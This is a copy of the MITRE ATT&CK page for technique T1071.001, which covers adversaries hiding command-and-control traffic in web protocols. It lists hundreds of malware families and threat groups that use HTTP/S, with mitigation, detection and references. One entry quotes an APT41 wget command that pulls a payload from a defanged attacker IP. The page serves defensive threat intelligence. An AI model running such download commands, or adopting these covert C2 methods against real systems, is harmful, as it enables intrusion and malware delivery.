Skip to content

T1071.001 Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S1 and WebSocket3 that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Item Value
ID T1071.001
Sub-techniques T1071.001, T1071.002, T1071.003, T1071.004
Tactics TA0011
Platforms Linux, Windows, macOS
Version 1.1
Created 15 March 2020
Last Modified 11 April 2023

Procedure Examples

ID Name Description
S0066 3PARA RAT 3PARA RAT uses HTTP for command and control.1
S0065 4H RAT 4H RAT uses HTTP for command and control.1
S0469 ABK ABK has the ability to use HTTP in communications with C2.105
S1028 Action RAT Action RAT can use HTTP to communicate with C2 servers.60
S0045 ADVSTORESHELL ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.293
S0331 Agent Tesla Agent Tesla has used HTTP for C2 communications.191192
S1025 Amadey Amadey has used HTTP for C2 communications.43
S0504 Anchor Anchor has used HTTP and HTTPS in C2 communications.37
S0584 AppleJeus AppleJeus has sent data to its C2 server via POST requests.5859
S0622 AppleSeed AppleSeed has the ability to communicate with C2 over HTTP.171172
G0026 APT18 APT18 uses HTTP for C2 communications.371
G0073 APT19 APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.353354
G0007 APT28 Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.133349
G0050 APT32 APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.366169
G0064 APT33 APT33 has used HTTP for command and control.335
G0067 APT37 APT37 uses HTTPS to conceal C2 communications.378
G0082 APT38 APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.326
G0087 APT39 APT39 has used HTTP in communications with C2.344345
G0096 APT41 APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.367
S0456 Aria-body Aria-body has used HTTP in C2 communications.225
S1029 AuTo Stealer AuTo Stealer can use HTTP to communicate with its C2 servers.60
S0473 Avenger Avenger has the ability to use HTTP in communication with C2.105
S0475 BackConfig BackConfig has the ability to use HTTPS for C2 communiations.137
S0031 BACKSPACE BACKSPACE uses HTTP as a transport to communicate with its command server.27
S0128 BADNEWS BADNEWS establishes a backdoor over HTTP.244
S0337 BadPatch BadPatch uses HTTP for C2.46
S0239 Bankshot Bankshot uses HTTP for command and control communication.57
S0534 Bazar Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.144146145
S0470 BBK BBK has the ability to use HTTP in communications with C2.105
S0127 BBSRAT BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.217
S0268 Bisonal Bisonal has used HTTP for C2 communications.249250
G1002 BITTER BITTER has used HTTP POST requests for C2.347346
S0089 BlackEnergy BlackEnergy communicates with its C2 server over HTTP.257
S0564 BlackMould BlackMould can send commands to C2 in the body of HTTP POST requests.196
S0520 BLINDINGCAN BLINDINGCAN has used HTTPS over port 443 for command and control.31
S0657 BLUELIGHT BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.118
S0635 BoomBox BoomBox has used HTTP POST requests for C2.116
G0060 BRONZE BUTLER BRONZE BUTLER malware has used HTTP for C2.159
S1063 Brute Ratel C4 Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.78
S0043 BUBBLEWRAP BUBBLEWRAP can communicate using HTTP or HTTPS.136
S0482 Bundlore Bundlore uses HTTP requests for C2.30
C0017 C0017 During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.202
C0018 C0018 During C0018, the threat actors used HTTP for C2 communications.381
C0021 C0021 During C0021, the threat actors used HTTP for some of their C2 communications.380
S0030 Carbanak The Carbanak malware communicates to its command server using HTTP with an encrypted payload.84
S0484 Carberp Carberp has connected to C2 servers via HTTP.230
S0335 Carbon Carbon can use HTTP in C2 communications.291
S0348 Cardinal RAT Cardinal RAT is downloaded using HTTP over port 443.66
S0631 Chaes Chaes has used HTTP for C2 communications.117
S0674 CharmPower CharmPower can use HTTP to communicate with C2.103
S0144 ChChes ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.109110
G0114 Chimera Chimera has used HTTPS for C2 communications.336
S0020 China Chopper China Chopper‘s server component executes code sent via HTTP POST commands.296
S0023 CHOPSTICK Various implementations of CHOPSTICK communicate with C2 over HTTP.200
S0660 Clambling Clambling has the ability to communicate over HTTP.45
S0054 CloudDuke One variant of CloudDuke uses HTTP and HTTPS for C2.28
G0080 Cobalt Group Cobalt Group has used HTTPS for C2.85351352
S0154 Cobalt Strike Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.127126128125
S0244 Comnie Comnie uses HTTP for C2 communication.215
S0126 ComRAT ComRAT has used HTTP requests for command and control.106107108
G0142 Confucius Confucius has used HTTP for C2 communications.318
S0137 CORESHELL CORESHELL can communicate over HTTP for C2.133132
S0050 CosmicDuke CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.28123
S0046 CozyCar CozyCar‘s main method of communicating with its C2 servers is using HTTP or HTTPS.274
S1023 CreepyDrive CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.73
S1024 CreepySnail CreepySnail can use HTTP for C2.73
S0115 Crimson Crimson can use a HTTP GET request to download its final payload.61
S0538 Crutch Crutch has conducted C2 communications with a Dropbox account using the HTTP API.138
S0527 CSPY Downloader CSPY Downloader can use GET requests to download additional payloads from C2.6
S0687 Cyclops Blink Cyclops Blink can download files via HTTP and HTTPS.3233
S0497 Dacls Dacls can use HTTPS in C2 communications.113114
S1014 DanBot DanBot can use HTTP in C2 communication.279
G0070 Dark Caracal Dark Caracal‘s version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.310
S0334 DarkComet DarkComet can use HTTP for C2 communications.155
S1066 DarkTortilla DarkTortilla has used HTTP and HTTPS for C2.239
S0673 DarkWatchman DarkWatchman uses HTTPS for command and control.216
S0187 Daserf Daserf uses HTTP for C2.159
S0243 DealersChoice DealersChoice uses HTTP for communication with the C2 server.158
S0616 DEATHRANSOM DEATHRANSOM can use HTTPS to download files.304
S0659 Diavol Diavol has used HTTP GET and POST requests for C2.201
S0200 Dipsind Dipsind uses HTTP for C2.29
S0600 Doki Doki has communicated with C2 over HTTPS.22
S0695 Donut Donut can use HTTP to download previously staged shellcode payloads.9
S0472 down_new down_new has the ability to use HTTP in C2 communications.105
S0186 DownPaper DownPaper communicates to its C2 server over HTTP.151
S0694 DRATzarus DRATzarus can use HTTP or HTTPS for C2 communications.227
S0384 Dridex Dridex has used POST requests and HTTPS for C2 communications.189190
S0502 Drovorub Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.166
S0062 DustySky DustySky has used both HTTP and HTTPS for C2.47
S0024 Dyre Dyre uses HTTPS for C2 communications.242243
S0554 Egregor Egregor has communicated with its C2 servers via HTTPS protocol.100
S0081 Elise Elise communicates over HTTP or HTTPS for C2.301
S0064 ELMER ELMER uses HTTP for command and control.150
S0082 Emissary Emissary uses HTTP or HTTPS for C2.120
S0363 Empire Empire can conduct command and control over protocols like HTTP and HTTPS.13
S0091 Epic Epic uses HTTP and HTTPS for C2 communications.153154
S0396 EvilBunny EvilBunny has executed C2 commands directly via HTTP.211
S0401 Exaramel for Linux Exaramel for Linux uses HTTPS for C2 communications.7879
S0569 Explosive Explosive has used HTTP for communication.173
S0512 FatDuke FatDuke can be controlled via a custom C2 protocol over HTTP.177
S0171 Felismus Felismus uses HTTP for C2.111
S0267 FELIXROOT FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.308165
G0085 FIN4 FIN4 has used HTTP POST requests to transmit data.361360
G0061 FIN8 FIN8 has used HTTPS for command and control.327
S0355 Final1stspy Final1stspy uses HTTP for C2.252
S0696 Flagpro Flagpro can communicate with its C2 using HTTP.232
S0381 FlawedAmmyy FlawedAmmyy has used HTTP for C2.302
S0661 FoggyWeb FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.288
C0001 Frankenstein During Frankenstein, the threat actors used HTTP GET requests for C2.386
G0047 Gamaredon Group Gamaredon Group has used HTTP and HTTPS for C2 communications.188321319322320323
S0168 Gazer Gazer communicates with its C2 servers over HTTP.101
S0666 Gelsemium Gelsemium can use HTTP/S in C2 communications.207
S0049 GeminiDuke GeminiDuke uses HTTP and HTTPS for command and control.28
S0460 Get2 Get2 has the ability to use HTTP to send information collected from an infected host to C2.303
S0249 Gold Dragon Gold Dragon uses HTTP for communication to the control servers.140
S0493 GoldenSpy GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.143
S0597 GoldFinder GoldFinder has used HTTP for C2.129
S0588 GoldMax GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.129254
S0477 Goopy Goopy has the ability to communicate with its C2 over HTTP.169
S0531 Grandoreiro Grandoreiro has the ability to use HTTP in C2 communications.9798
S0237 GravityRAT GravityRAT uses HTTP for C2.62
S0342 GreyEnergy GreyEnergy uses HTTP and HTTPS for C2 communications.165
S0632 GrimAgent GrimAgent has the ability to use HTTP for C2 communications.273
S0561 GuLoader GuLoader can use HTTP to retrieve additional binaries.130131
G0125 HAFNIUM HAFNIUM has used open-source C2 frameworks, including Covenant.348
S0037 HAMMERTOSS The “Uploader” variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.51
S0391 HAWKBALL HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.246
S0170 Helminth Helminth can use HTTP for C2.284
S0087 Hi-Zor Hi-Zor communicates with its C2 server over HTTPS.300
G0126 Higaisa Higaisa used HTTP and HTTPS to send data back to its C2 server.372373
S0009 Hikit Hikit has used HTTP for C2.119
S0070 HTTPBrowser HTTPBrowser has used HTTP and HTTPS for command and control.180253
S0068 httpclient httpclient uses HTTP for command and control.1
S0398 HyperBro HyperBro has used HTTPS for C2 communications.174
S1022 IceApple IceApple can use HTTP GET to request and pull information from C2.70
S0483 IcedID IcedID has used HTTPS in communications with C2.299
G0100 Inception Inception has used HTTP, HTTPS, and WebDav in network communications.338218
S0604 Industroyer Industroyer’s main backdoor connected to a remote C2 server using HTTPS.76
S0260 InvisiMole InvisiMole uses HTTP for C2 communications.91
S0015 Ixeshe Ixeshe uses HTTP for command and control.289290
S0044 JHUHUGIT JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.394041
S0265 Kazuar Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.280
G0004 Ke3chang Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.324240
S1020 Kevin Variants of Kevin can communicate with C2 over HTTP.77
S0276 Keydnap Keydnap uses HTTPS for command and control.42
S1051 KEYPLUG KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.202
S0526 KGH_SPY KGH_SPY can send data to C2 with HTTP POST requests.6
G0094 Kimsuky Kimsuky has used HTTP GET and POST requests for C2.312
S0599 Kinsing Kinsing has communicated with C2 over HTTP.272
S0250 Koadic Koadic has used HTTP for C2 communications.4
S0162 Komplex The Komplex C2 channel uses HTTP POST requests.56
S0356 KONNI KONNI has used HTTP POST for C2.212213
G0032 Lazarus Group Lazarus Group has conducted C2 over HTTP and HTTPS.317113114316315314
S0513 LiteDuke LiteDuke can use HTTP GET requests in C2 communications.177
S0680 LitePower LitePower can use HTTP and HTTPS for C2 communications.226
S0447 Lokibot Lokibot has used HTTP for C2 communications.6869
S0582 LookBack LookBack’s C2 proxy tool sends data to a C2 server over HTTP.156
S0042 LOWBALL LOWBALL command and control occurs via HTTPS over port 443.136
G1014 LuminousMoth LuminousMoth has used HTTP for C2.370
S0409 Machete Machete uses HTTP for Command & Control.193194195
S0282 MacSpy MacSpy uses HTTP for command and control.256
S1060 Mafalda Mafalda can use HTTP for C2.71
G0059 Magic Hound Magic Hound has used HTTP for C2.364363362
S0652 MarkiRAT MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.268
S0449 Maze Maze has communicated to hard-coded IP addresses via HTTP.278
S0500 MCMD MCMD can use HTTPS in communication with C2 web servers.18
S0459 MechaFlounder MechaFlounder has the ability to use HTTP in communication with C2.35
G1013 Metador Metador has used HTTP for C2.71
S1059 metaMain metaMain can use HTTP for C2 communications.7172
S0455 Metamorfo Metamorfo has used HTTP for C2.247248
S0339 Micropsia Micropsia uses HTTP and HTTPS for C2 network communications.6364
S1015 Milan Milan can use HTTPS for communication with C2.12277121
S0051 MiniDuke MiniDuke uses HTTP and HTTPS for command and control.28177
S0084 Mis-Type Mis-Type network traffic can communicate over HTTP.147
S1026 Mongall Mongall can use HTTP for C2 communication.102
S0284 More_eggs More_eggs uses HTTPS for C2.8586
S1047 Mori Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.65
G0069 MuddyWater MuddyWater has used HTTP for C2 communications.33412
G0129 Mustang Panda Mustang Panda has communicated with its C2 via HTTP POST requests.328329330331
S0699 Mythic Mythic supports HTTP-based C2 profiles.5
S0691 Neoichor Neoichor can use HTTP for C2 communications.240
S0034 NETEAGLE NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.27
S0198 NETWIRE NETWIRE has the ability to communicate over HTTP.297298
C0002 Night Dragon During Night Dragon, threat actors used HTTP for C2.382
S0385 njRAT njRAT has used HTTP for C2 communications.134
S0353 NOKKI NOKKI has used HTTP for C2 communications.245
S0340 Octopus Octopus has used HTTP GET and POST requests for C2 communications.262261
G0049 OilRig OilRig has used HTTP for C2.369276368
S0439 Okrum Okrum uses HTTP for communication with its C2.307
S0138 OLDBAIT OLDBAIT can use HTTP for C2.133
S0052 OnionDuke OnionDuke uses HTTP and HTTPS for C2.28
S0264 OopsIE OopsIE uses HTTP for C2 communications.160161
C0012 Operation CuckooBees During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.383
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.385
C0014 Operation Wocao During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.379
G0071 Orangeworm Orangeworm has used HTTP for C2.357
S0352 OSX_OCEANLOTUS.D OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information.170
S0594 Out1 Out1 can use HTTP and HTTPS in communications with remote hosts.12
S1017 OutSteel OutSteel has used HTTP for C2 communications.24
S0072 OwaAuth OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.180
S0598 P.A.S. Webshell P.A.S. Webshell can issue commands via HTTP POST.79
S0664 Pandora Pandora can communicate over HTTP.20
S1050 PcShare PcShare has used HTTP for C2 communication.14
S0643 Peppy Peppy can use HTTP to communicate with C2.61
S0048 PinchDuke PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.28
S1031 PingPull A PingPull variant can communicate with its C2 servers by using HTTPS.277
S0435 PLEAD PLEAD has used HTTP for communications with command and control (C2) servers.141142
S0013 PlugX PlugX can be configured to use HTTP for command and control.180237
S0067 pngdowner pngdowner uses HTTP for command and control.1
S0428 PoetRAT PoetRAT has used HTTP and HTTPs for C2 communications.238
S0518 PolyglotDuke PolyglotDuke has has used HTTP GET requests in C2 communications.177
S0453 Pony Pony has sent collected information to the C2 via HTTP POST request.124
S0378 PoshC2 PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.11
S0441 PowerShower PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.218
S0371 POWERTON POWERTON has used HTTP/HTTPS for C2 traffic.67
S1046 PowGoop PowGoop can send HTTP GET requests to malicious servers.99
S0184 POWRUNER POWRUNER can use HTTP for C2 communications.275276
S0238 Proxysvc Proxysvc uses HTTP over SSL to communicate commands with the control server.157
S0078 Psylo Psylo uses HTTPS for C2.115
S0147 Pteranodon Pteranodon can use HTTP for C2.188
S0196 PUNCHBUGGY PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.208209210
S0192 Pupy Pupy can communicate over HTTP for C2.10
S0650 QakBot QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.525354
S0269 QUADAGENT QUADAGENT uses HTTPS and HTTP for C2 communications.152
S0686 QuietSieve QuietSieve can use HTTPS in C2 communications.187
S0629 RainyDay RainyDay can use HTTP in C2 communications.81
S0458 Ramsay Ramsay has used HTTP for C2.199
G0075 Rancor Rancor has used HTTP for C2.337
S0241 RATANKBA RATANKBA uses HTTP/HTTPS for command and control communication.178179
S0662 RCSession RCSession can use HTTP in C2 communications.4544
S0495 RDAT RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.80
S0172 Reaver Some Reaver variants use HTTP for C2.34
S0153 RedLeaves RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.21236
S0019 Regin The Regin malware platform supports many standard protocols, including HTTP and HTTPS.205
S0375 Remexi Remexi uses BITSAdmin to communicate with the C2 server over HTTP.38
S0125 Remsec Remsec is capable of using HTTP and HTTPS for C2.258259260
S0496 REvil REvil has used HTTP and HTTPS in communication with C2.182183184185186
S0258 RGDoor RGDoor uses HTTP for C2 communications.104
S0003 RIPTIDE APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.229
S0448 Rising Sun Rising Sun has used HTTP and HTTPS for command and control.294
G0106 Rocke Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.359
S0240 ROKRAT ROKRAT can use HTTP and HTTPS for command and control communication.269270271
S0148 RTM RTM has initiated connections to external domains using HTTPS.306
S0085 S-Type S-Type uses HTTP for C2.147
S1018 Saint Bot Saint Bot has used HTTP for C2 communications.167
S0074 Sakula Sakula uses HTTP for C2.25
G0034 Sandworm Team Sandworm Team‘s BCS-server tool connects to the designated C2 server via HTTP.355
S0053 SeaDuke SeaDuke uses HTTP and HTTPS for C2.28
S0345 Seasalt Seasalt uses HTTP for C2 communications.23
S0382 ServHelper ServHelper uses HTTP for C2.204
S0596 ShadowPad ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.295
S0140 Shamoon Shamoon has used HTTP for C2.285
S1019 Shark Shark has the ability to use HTTP in C2 communications.122121
S0444 ShimRat ShimRat communicated over HTTP and HTTPS with C2 servers.19
S0445 ShimRatReporter ShimRatReporter communicated over HTTP with preconfigured C2 servers.19
S0589 Sibot Sibot communicated with its C2 server via HTTP GET requests.129
S0610 SideTwist SideTwist has used HTTP GET and POST requests over port 443 for C2.251
G0121 Sidewinder Sidewinder has used HTTP in C2 communications.339340341
G0083 SilverTerrier SilverTerrier uses HTTP for C2 communications.358
S0633 Sliver Sliver has the ability to support C2 communications over HTTP/S.151617
S0533 SLOTHFULMEDIA SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.162
S1035 Small Sieve Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.65
S0226 Smoke Loader Smoke Loader uses HTTP for C2.55
S0649 SMOKEDHAM SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.168
S0159 SNUGRIDE SNUGRIDE communicates with its C2 server over HTTP.21
C0024 SolarWinds Compromise During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.384
S0516 SoreFang SoreFang can use HTTP in C2 communications.25590
S0543 Spark Spark has used HTTP POST requests to communicate with its C2 server to receive commands.286
S0374 SpeakUp SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server. 95
S1030 Squirrelwaffle Squirrelwaffle has used HTTP POST requests for C2 communications.206
S1037 STARWHALE STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.28365
G0038 Stealth Falcon Stealth Falcon malware communicates with its C2 server via HTTPS.325
S0491 StrongPity StrongPity can use HTTP and HTTPS in C2 communications.234235
S0603 Stuxnet Stuxnet uses HTTP to communicate with a command and control server. 198
S1042 SUGARDUMP A SUGARDUMP variant has used HTTP for C2.267
S0559 SUNBURST SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.149
S0578 SUPERNOVA SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.4849
S1064 SVCReady SVCReady can communicate with its C2 servers via HTTP.96
S0060 Sys10 Sys10 uses HTTP for C2.181
G0092 TA505 TA505 has used HTTP to communicate with C2 nodes.350
G0127 TA551 TA551 has used HTTP for C2 communications.164
S0011 Taidoor Taidoor has used HTTP GET and POST requests for C2.203
G0139 TeamTNT TeamTNT has the curl command to send credentials over HTTP and the curl and wget commands to download new software.377374375 TeamTNT has also used a custom user agent HTTP header in shell scripts.376
S0595 ThiefQuest ThiefQuest uploads files via unencrypted HTTP. 9394
G0027 Threat Group-3390 Threat Group-3390 malware has used HTTP for C2.365
S0668 TinyTurla TinyTurla can use HTTPS in C2 communications.231
S0671 Tomiris Tomiris can use HTTP to establish C2 communications.92
S0678 Torisma Torisma can use HTTP and HTTPS for C2 communications.112
S0682 TrailBlazer TrailBlazer has used HTTP requests for C2.263
S0266 TrickBot TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.3637
S0094 Trojan.Karagany Trojan.Karagany can communicate with C2 via HTTP POST requests.135
G0081 Tropic Trooper Tropic Trooper has used HTTP in communication with the C2.332333
S0436 TSCookie TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.7475
S0647 Turian Turian has the ability to use HTTP for its C2.228
G0010 Turla Turla has used HTTP and HTTPS for C2 communications.342343
S0333 UBoatRAT UBoatRAT has used HTTP for C2 communications.309
S0275 UPPERCUT UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.139
S0386 Ursnif Ursnif has used HTTPS for C2.264265266
S0476 Valak Valak has used HTTP in communications with C2.163164
S0636 VaporRage VaporRage can use HTTP to download shellcode from compromised websites.116
S0207 Vasport Vasport creates a backdoor by making a connection using a HTTP POST.241
S0442 VBShower VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.292
S0257 VERMIN VERMIN uses HTTP for C2 communications.233
S0514 WellMess WellMess can use HTTP and HTTPS in C2 communications.87888990
S0689 WhisperGate WhisperGate can make an HTTPS connection to download additional files.175176
G0112 Windshift Windshift has used tools that communicate with C2 over HTTP.311
S0466 WindTail WindTail has the ability to use HTTP for C2 communications.281
S0059 WinMM WinMM uses HTTP for C2.181
S0430 Winnti for Linux Winnti for Linux has used HTTP in outbound communications.148
S0141 Winnti for Windows Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.26
G0090 WIRTE WIRTE has used HTTP for network communication.313
G0102 Wizard Spider Wizard Spider has used HTTP for network communications.356
S1065 Woody RAT Woody RAT can communicate with its C2 server using HTTP requests.197
S0341 Xbash Xbash uses HTTP for C2 communications.214
S0653 xCaon xCaon has communicated with the C2 server by sending POST requests over HTTP.282
S0388 YAHOYAH YAHOYAH uses HTTP for C2.305
S0251 Zebrocy Zebrocy uses HTTP for C2.219220221222223224
S0230 ZeroT ZeroT has used HTTP for C2.8283
S0330 Zeus Panda Zeus Panda uses HTTP for C2 communications.287
S0086 ZLib ZLib communicates over HTTP for C2.147
S0412 ZxShell ZxShell has used HTTP for C2 connections.50

Mitigations

ID Mitigation Description
M1031 Network Intrusion Prevention Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.

Detection

ID Data Source Data Component
DS0029 Network Traffic Network Traffic Content

References

  1. Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016. 

  2. Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. 

  3. Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023. 

  4. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. 

  5. Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022. 

  6. Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. 

  7. Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023. 

  8. Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023. 

  9. TheWover. (2019, May 9). donut. Retrieved March 25, 2022. 

  10. Nicolas Verdier. (n.d.). Retrieved January 29, 2018. 

  11. Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019. 

  12. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. 

  13. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. 

  14. Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022. 

  15. NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. 

  16. Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021. 

  17. BishopFox. (n.d.). Sliver. Retrieved September 15, 2021. 

  18. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. 

  19. Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020. 

  20. Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021. 

  21. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. 

  22. Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021. 

  23. Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016. 

  24. Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022. 

  25. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016. 

  26. Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. 

  27. FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. 

  28. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. 

  29. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018. 

  30. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020. 

  31. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020. 

  32. Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017. 

  33. Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020. 

  34. Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018. 

  35. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020. 

  36. Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019. 

  37. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016. 

  38. Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018. 

  39. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. 

  40. Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018. 

  41. Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022. 

  42. Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021. 

  43. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021. 

  44. Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018. 

  45. ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016. 

  46. Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021. 

  47. Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021. 

  48. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. 

  49. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. 

  50. Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021. 

